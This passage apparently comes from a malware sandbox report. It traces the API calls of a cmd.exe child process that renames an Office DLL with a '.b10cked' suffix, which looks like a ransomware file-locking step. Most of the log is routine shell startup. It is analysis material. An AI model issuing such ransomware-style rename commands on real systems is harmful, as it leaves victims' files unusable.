CloseHandle (hObject=0x50) returned 1 [0175.007] _vsnwprintf (in: _Buffer=0x18f6fc, _BufferCount=0x13, _Format="%08X", _ArgList=0x18f5c0 | out: _Buffer="00000000") returned 8 [0175.007] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0175.007] GetEnvironmentStringsW () returned 0x3324c0* [0175.008] FreeEnvironmentStringsW (penv=0x3324c0) returned 1 [0175.008] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0175.008] GetEnvironmentStringsW () returned 0x3324c0* [0175.008] FreeEnvironmentStringsW (penv=0x3324c0) returned 1 [0175.008] DeleteProcThreadAttributeList (in: lpAttributeList=0x18f618 | out: lpAttributeList=0x18f618) [0175.008] _get_osfhandle (_FileHandle=1) returned 0x7 [0175.008] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0175.008] _get_osfhandle (_FileHandle=1) returned 0x7 [0175.008] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0175.008] _get_osfhandle (_FileHandle=0) returned 0x3 [0175.008] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0175.008] SetConsoleInputExeNameW () returned 0x1 [0175.008] GetConsoleOutputCP () returned 0x1b5 [0175.009] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0175.009] SetThreadUILanguage (LangId=0x0) returned 0x409 [0175.009] exit (_Code=0) Process: id = "307" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16b60" os_pid = "0xa84" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\WWINTL~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\WWINTL.DLL.trx_dll.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 23722 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 23723 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 23724 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 23725 start_va = 0x170000 end_va = 0x26ffff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 23726 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 23727 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 23728 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 23729 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 23730 start_va = 0x7ffda000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffda000" filename = "" Region: id = 23731 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 23951 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 23952 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 23953 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 23954 start_va = 0x390000 end_va = 0x39ffff entry_point = 0x0 region_type = private name = "private_0x0000000000390000" filename = "" Region: id = 23955 start_va = 0x3c0000 end_va = 0x4bffff entry_point = 0x0 region_type = private name = "private_0x00000000003c0000" filename = "" Region: id = 23956 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 23957 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 23958 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 23959 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 23960 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 23961 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 23962 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 23963 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 23964 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 23965 start_va = 0x270000 end_va = 0x337fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000270000" filename = "" Region: id = 23966 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 23967 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 23968 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 23969 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 23970 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 23971 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 23972 start_va = 0x4c0000 end_va = 0x5c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004c0000" filename = "" Region: id = 23973 start_va = 0x5d0000 end_va = 0x11cffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005d0000" filename = "" Region: id = 23974 start_va = 0x11d0000 end_va = 0x1332fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011d0000" filename = "" Thread: id = 407 os_tid = 0x994 [0174.253] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x26fac4 | out: lpSystemTimeAsFileTime=0x26fac4*(dwLowDateTime=0x9dc2e040, dwHighDateTime=0x1d440a9)) [0174.253] GetCurrentProcessId () returned 0xa84 [0174.253] GetCurrentThreadId () returned 0x994 [0174.253] GetTickCount () returned 0x32b24 [0174.253] QueryPerformanceCounter (in: lpPerformanceCount=0x26fabc | out: lpPerformanceCount=0x26fabc*=23104202576) returned 1 [0174.253] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0174.253] __set_app_type (_Type=0x1) [0174.253] __p__fmode () returned 0x76b331f4 [0174.253] __p__commode () returned 0x76b331fc [0174.254] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0174.254] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0174.254] GetCurrentThreadId () returned 0x994 [0174.254] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x994) returned 0x38 [0174.254] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0174.254] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0174.254] SetThreadUILanguage (LangId=0x0) returned 0x409 [0174.254] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0174.254] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x26fa54 | out: phkResult=0x26fa54*=0x0) returned 0x2 [0174.254] VirtualQuery (in: lpAddress=0x26fa8b, lpBuffer=0x26fa24, dwLength=0x1c | out: lpBuffer=0x26fa24*(BaseAddress=0x26f000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0174.254] VirtualQuery (in: lpAddress=0x170000, lpBuffer=0x26fa24, dwLength=0x1c | out: lpBuffer=0x26fa24*(BaseAddress=0x170000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0174.254] VirtualQuery (in: lpAddress=0x171000, lpBuffer=0x26fa24, dwLength=0x1c | out: lpBuffer=0x26fa24*(BaseAddress=0x171000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0174.254] VirtualQuery (in: lpAddress=0x173000, lpBuffer=0x26fa24, dwLength=0x1c | out: lpBuffer=0x26fa24*(BaseAddress=0x173000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0174.254] VirtualQuery (in: lpAddress=0x270000, lpBuffer=0x26fa24, dwLength=0x1c | out: lpBuffer=0x26fa24*(BaseAddress=0x270000, AllocationBase=0x270000, AllocationProtect=0x2, RegionSize=0x2000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0174.254] GetConsoleOutputCP () returned 0x1b5 [0174.254] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0174.254] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0174.255] _get_osfhandle (_FileHandle=1) returned 0x7 [0174.255] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0174.255] _get_osfhandle (_FileHandle=1) returned 0x7 [0174.255] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0174.255] _get_osfhandle (_FileHandle=1) returned 0x7 [0174.255] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0174.255] _get_osfhandle (_FileHandle=0) returned 0x3 [0174.255] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0174.255] _get_osfhandle (_FileHandle=0) returned 0x3 [0174.255] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0174.255] GetEnvironmentStringsW () returned 0x3d0210* [0174.256] FreeEnvironmentStringsW (penv=0x3d0210) returned 1 [0174.256] GetEnvironmentStringsW () returned 0x3d0210* [0174.256] FreeEnvironmentStringsW (penv=0x3d0210) returned 1 [0174.256] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x26e9c4 | out: phkResult=0x26e9c4*=0x40) returned 0x0 [0174.256] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x26e9cc, lpData=0x26e9d0, lpcbData=0x26e9c8*=0x1000 | out: lpType=0x26e9cc*=0x0, lpData=0x26e9d0*=0xa0, lpcbData=0x26e9c8*=0x1000) returned 0x2 [0174.256] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x26e9cc, lpData=0x26e9d0, lpcbData=0x26e9c8*=0x1000 | out: lpType=0x26e9cc*=0x4, lpData=0x26e9d0*=0x1, lpcbData=0x26e9c8*=0x4) returned 0x0 [0174.256] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x26e9cc, lpData=0x26e9d0, lpcbData=0x26e9c8*=0x1000 | out: lpType=0x26e9cc*=0x0, lpData=0x26e9d0*=0x1, lpcbData=0x26e9c8*=0x1000) returned 0x2 [0174.256] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x26e9cc, lpData=0x26e9d0, lpcbData=0x26e9c8*=0x1000 | out: lpType=0x26e9cc*=0x4, lpData=0x26e9d0*=0x0, lpcbData=0x26e9c8*=0x4) returned 0x0 [0174.256] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x26e9cc, lpData=0x26e9d0, lpcbData=0x26e9c8*=0x1000 | out: lpType=0x26e9cc*=0x4, lpData=0x26e9d0*=0x40, lpcbData=0x26e9c8*=0x4) returned 0x0 [0174.256] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x26e9cc, lpData=0x26e9d0, lpcbData=0x26e9c8*=0x1000 | out: lpType=0x26e9cc*=0x4, lpData=0x26e9d0*=0x40, lpcbData=0x26e9c8*=0x4) returned 0x0 [0174.256] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x26e9cc, lpData=0x26e9d0, lpcbData=0x26e9c8*=0x1000 | out: lpType=0x26e9cc*=0x0, lpData=0x26e9d0*=0x40, lpcbData=0x26e9c8*=0x1000) returned 0x2 [0174.256] RegCloseKey (hKey=0x40) returned 0x0 [0174.256] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x26e9c4 | out: phkResult=0x26e9c4*=0x40) returned 0x0 [0174.256] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x26e9cc, lpData=0x26e9d0, lpcbData=0x26e9c8*=0x1000 | out: lpType=0x26e9cc*=0x0, lpData=0x26e9d0*=0x40, lpcbData=0x26e9c8*=0x1000) returned 0x2 [0174.256] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x26e9cc, lpData=0x26e9d0, lpcbData=0x26e9c8*=0x1000 | out: lpType=0x26e9cc*=0x4, lpData=0x26e9d0*=0x1, lpcbData=0x26e9c8*=0x4) returned 0x0 [0174.256] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x26e9cc, lpData=0x26e9d0, lpcbData=0x26e9c8*=0x1000 | out: lpType=0x26e9cc*=0x0, lpData=0x26e9d0*=0x1, lpcbData=0x26e9c8*=0x1000) returned 0x2 [0174.256] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x26e9cc, lpData=0x26e9d0, lpcbData=0x26e9c8*=0x1000 | out: lpType=0x26e9cc*=0x4, lpData=0x26e9d0*=0x0, lpcbData=0x26e9c8*=0x4) returned 0x0 [0174.256] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x26e9cc, lpData=0x26e9d0, lpcbData=0x26e9c8*=0x1000 | out: lpType=0x26e9cc*=0x4, lpData=0x26e9d0*=0x9, lpcbData=0x26e9c8*=0x4) returned 0x0 [0174.256] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x26e9cc, lpData=0x26e9d0, lpcbData=0x26e9c8*=0x1000 | out: lpType=0x26e9cc*=0x4, lpData=0x26e9d0*=0x9, lpcbData=0x26e9c8*=0x4) returned 0x0 [0174.256] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x26e9cc, lpData=0x26e9d0, lpcbData=0x26e9c8*=0x1000 | out: lpType=0x26e9cc*=0x0, lpData=0x26e9d0*=0x9, lpcbData=0x26e9c8*=0x1000) returned 0x2 [0174.256] RegCloseKey (hKey=0x40) returned 0x0 [0174.256] time (in: timer=0x0 | out: timer=0x0) returned 0x5b88638a [0174.256] srand (_Seed=0x5b88638a) [0174.256] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\WWINTL~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\WWINTL.DLL.trx_dll.b10cked\"" [0174.256] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\WWINTL~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\WWINTL.DLL.trx_dll.b10cked\"" [0174.257] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0174.257] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3d1970, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0174.257] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0174.257] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0174.257] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0174.257] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0174.257] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0174.257] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0174.257] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0174.257] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0174.257] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0174.257] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0174.257] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0174.257] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0174.257] GetEnvironmentStringsW () returned 0x3d2360* [0174.258] FreeEnvironmentStringsW (penv=0x3d2360) returned 1 [0174.258] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0174.258] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0174.258] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0174.258] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0174.258] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0174.258] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0174.258] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0174.258] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0174.258] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0174.258] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0174.258] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x26f790 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0174.258] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x26f790, lpFilePart=0x26f78c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x26f78c*="Desktop") returned 0x18 [0174.258] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0174.258] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x26f50c | out: lpFindFileData=0x26f50c) returned 0x3d09f0 [0174.258] FindClose (in: hFindFile=0x3d09f0 | out: hFindFile=0x3d09f0) returned 1 [0174.258] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x26f50c | out: lpFindFileData=0x26f50c) returned 0x3d09f0 [0174.258] FindClose (in: hFindFile=0x3d09f0 | out: hFindFile=0x3d09f0) returned 1 [0174.258] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x26f50c | out: lpFindFileData=0x26f50c) returned 0x3d09f0 [0174.258] FindClose (in: hFindFile=0x3d09f0 | out: hFindFile=0x3d09f0) returned 1 [0174.259] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0174.259] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0174.259] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0174.259] GetEnvironmentStringsW () returned 0x3d0210* [0174.259] FreeEnvironmentStringsW (penv=0x3d0210) returned 1 [0174.259] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0174.259] GetConsoleOutputCP () returned 0x1b5 [0174.259] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0174.259] GetUserDefaultLCID () returned 0x409 [0174.260] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0174.260] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x26f8d0, cchData=128 | out: lpLCData="0") returned 2 [0174.260] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x26f8d0, cchData=128 | out: lpLCData="0") returned 2 [0174.260] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x26f8d0, cchData=128 | out: lpLCData="1") returned 2 [0174.260] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0174.260] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0174.260] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0174.260] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0174.260] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0174.260] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0174.260] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0174.260] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0174.260] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0174.260] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0174.260] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0174.261] GetConsoleTitleW (in: lpConsoleTitle=0x3c0930, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0174.261] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0174.261] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0174.261] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0174.261] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0174.262] _wcsicmp (_String1="move", _String2=")") returned 68 [0174.262] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0174.262] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0174.262] _wcsicmp (_String1="IF", _String2="move") returned -4 [0174.262] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0174.262] _wcsicmp (_String1="REM", _String2="move") returned 5 [0174.262] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0174.265] GetConsoleTitleW (in: lpConsoleTitle=0x26f5c8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0174.266] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0174.266] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0174.266] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0174.266] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0174.266] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0174.266] _wcsicmp (_String1="move", _String2="CD") returned 10 [0174.266] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0174.266] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0174.266] _wcsicmp (_String1="move", _String2="REN") returned -5 [0174.266] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0174.266] _wcsicmp (_String1="move", _String2="SET") returned -6 [0174.266] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0174.266] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0174.266] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0174.266] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0174.266] _wcsicmp (_String1="move", _String2="MD") returned 11 [0174.266] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0174.266] _wcsicmp (_String1="move", _String2="RD") returned -5 [0174.266] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0174.266] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0174.266] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0174.266] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0174.266] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0174.266] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0174.266] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0174.266] _wcsicmp (_String1="move", _String2="VER") returned -9 [0174.266] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0174.266] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0174.266] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0174.266] _wcsicmp 